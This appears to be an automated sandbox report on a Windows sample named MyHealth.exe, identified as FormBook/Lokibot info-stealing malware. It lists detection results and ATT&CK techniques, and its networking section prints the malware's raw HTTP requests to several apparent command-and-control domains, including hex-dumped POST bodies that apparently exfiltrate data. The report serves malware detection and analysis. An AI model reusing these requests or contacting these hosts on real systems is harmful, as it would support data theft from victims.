
Analysis Report MyHealth.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:216825
Start date:20.03.2020
Start time:14:04:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 17m 5s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:MyHealth.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 92.2% (good quality ratio 59.9%)
  • Quality average: 52%
  • Quality standard deviation: 41.6%
HCA Information:
  • Successful, ratio: 61%
  • Number of executed functions: 99
  • Number of non-executed functions: 315
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, MusNotifyIcon.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 172.217.23.206, 2.18.68.82, 93.184.220.29, 216.58.201.78, 40.90.137.120, 40.90.23.154, 40.90.137.125, 51.124.78.146, 52.158.208.111, 51.105.249.223, 204.79.197.200, 13.107.21.200, 51.104.136.2
  • Excluded domains from analysis (whitelisted): www.bing.com, docs.google.com, umwatson.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, cs9.wac.phicdn.net, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ocsp.digicert.com, a-0001.a-afdentry.net.trafficmanager.net, login.live.com, emea1.notify.windows.com.akadns.net, drive.google.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: FormBook Lokibot
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend behavior
Some HTTP requests failed (404); the sample will likely exhibit less behavior
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link
Execution: Execution through Module Load1, Graphical User Interface1, Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface
Persistence: Registry Run Keys / Startup Folder1, Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service
Privilege Escalation: Process Injection512, Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service
Defense Evasion: Masquerading1, Software Packing1, Virtualization/Sandbox Evasion12, Process Injection512, Deobfuscate/Decode Files or Information1, Obfuscated Files or Information2
Credential Access: Credential Dumping1, Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force
Discovery: Virtualization/Sandbox Evasion12, Process Discovery2, Security Software Discovery221, Remote System Discovery1, File and Directory Discovery2, System Information Discovery13
Lateral Movement: Remote File Copy3, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software
Collection: Email Collection1, Man in the Browser1, Data from Local System1, Input Capture, Data Staged, Screen Capture
Exfiltration: Data Encrypted1, Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Standard Cryptographic Protocol12, Remote File Copy3, Standard Non-Application Layer Protocol4, Standard Application Layer Protocol15, Standard Cryptographic Protocol, Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

Signature Overview



AV Detection:

Multi AV Scanner detection for submitted file
Source: MyHealth.exe | Virustotal: Detection: 68%
Source: MyHealth.exe | Metadefender: Detection: 45%
Source: MyHealth.exe | ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.MyHealth.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 16.0.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 14.2.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 17.0.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 2.0.MyHealth.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 15.2.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 14.0.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.MyHealth.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 15.0.jj0t1be8.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.factorylegends.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.frawgboy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.kiheielectricbikes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.3365ssr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.sebasview.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.michalshahar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.nacemo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.workingtechnologiesmexico.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.factorylegends.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1 | Host: www.frawgboy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 204.11.56.48
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | ASN Name: unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 
4b 69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.kiheielectricbikes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kiheielectricbikes.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 48 2d 50 6a 65 2d 4c 53 54 33 54 50 31 38 66 46 79 63 71 53 6f 6f 4d 62 37 4f 68 79 77 6f 41 43 65 47 48 56 39 59 70 67 6b 34 53 34 74 67 54 53 73 5f 6d 72 54 2d 57 63 52 39 72 53 72 53 69 63 33 4a 56 66 70 4c 62 44 79 39 59 46 32 6a 70 6b 64 47 77 71 66 6e 47 73 6a 74 4a 4a 64 79 50 32 77 4a 54 4a 76 2d 54 79 4b 31 54 70 42 49 4f 38 76 53 54 2d 49 5f 5a 58 30 6c 62 4b 47 4d 4b 4b 58 50 4d 41 70 69 36 39 50 56 4c 49 73 6f 77 56 56 68 4e 73 73 31 47 31 5a 53 68 53 62 57 59 4f 30 50 37 41 6f 6d 4f 68 69 66 66 55 56 73 55 30 48 48 35 54 51 6a 68 69 37 46 37 62 72 32 65 46 7e 4b 28 43 78 30 4d 6c 70 38 31 52 74 4a 66 51 32 78 28 5f 44 52 75 31 50 70 30 38 46 69 77 64 6e 38 46 6e 78 57 79 70 72 31 50 45 6e 75 32 44 67 59 61 4a 6c 68 71 75 71 72 56 47 6e 74 63 50 50 64 33 39 49 72 66 32 50 5f 4f 70 4a 67 37 4e 4a 59 28 44 35 49 72 55 6e 5a 73 4b 4a 31 73 70 39 36 38 75 74 69 64 4b 38 34 50 39 77 53 55 4d 75 4d 51 58 39 6e 78 45 37 31 72 6a 30 42 33 4e 6c 67 63 6b 57 68 4e 44 76 78 67 72 6e 4e 71 71 67 38 49 6e 59 45 61 64 36 31 4d 6f 35 76 47 6d 52 48 4a 75 31 4b 34 45 79 67 6e 65 55 61 6c 6f 57 50 43 67 74 4e 71 4f 36 55 61 75 65 66 39 69 4a 6d 42 4b 37 33 78 77 48 39 4e 65 43 35 63 43 4c 41 64 61 54 38 42 44 58 62 4c 74 67 30 51 6c 69 6a 49 64 65 4f 7a 66 56 74 63 6a 38 62 6e 54 36 54 73 55 63 36 78 69 67 4f 74 4f 4d 39 67 57 62 57 61 6b 6f 6c 46 39 33 36 5a 4f 63 44 44 34 66 30 46 74 39 36 62 64 4e 42 42 69 34 31 68 63 64 6f 67 79 36 7a 72 61 35 43 63 39 4d 6a 46 6c 76 45 46 5a 53 64 5a 41 31 42 64 4d 6f 66 5a 
6e 66 39 37 58 74 67 53 67 46 6b 6a 4c 44 70 6e 71 4b 73 75 44 59 30 31 68 65 6e 77 57 50 6f 48 64 47 46 63 42 58 2d 6e 39 43 59 33 62 78 4f 55 7a 4f 39 57 59 66 42 43 47 4a 63 7e 74 7e 73 64 6e 28 59 39 6a 28 77 70 77 48 41 36 4f 31 63 42 36 6c 64 62 57 28 76 65 43 28 59 30 32 6a 39 65 38 66 37 67 52 78 73 63 47 78 42 67 38 66 63 76 6d 6e 4c 28 70 64 44 72 6d 42 6c 44 78 54 62 4a 6b 34 78 45 6b 68 72 61 4a 7a 6c 76 53 43 70 42 4c 4c 55 6b 4c 4b 41 6e 43 74 4c 45 54 48 6e 56 72 51 4e 4c 48 68 6f 57 76 28 32 34 33 54 38 66 74 63 5f 48 61 4c 4c 62 77 6e 6a 6f 4c 72 53 36 36 35 47 48 57 28 65 5a 71 39 59 74 67 6c 71 58 66 48 6e 37 31 70 46 55 4c 78 35 51 4d 44 70 35 34 74 67 32 72 48 39 28 4d 63 52 6c 57 73 34 61 34 63 78 31 6b 61 63 7a 58 32 37 61 70 33 4a 7a 75 52 6a 53 5a 38 39 31 36 50 59 53 33 44 61 4e 31 4f 52 69 43 39 54 48 67 51 48 62 56 45 52 62 48 6d 4c 67 6c 35 63 79 6c 6b 4f 78 4c 61 39 55 75 31 32 53 61 7e 77 35 5f 7a 41 5a 75 57 38 6c 76 61 70 4c 43 75 33 52 6c 64 35 76 53 6c 55 50 78 39 6c 34 7
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 
39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 
39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 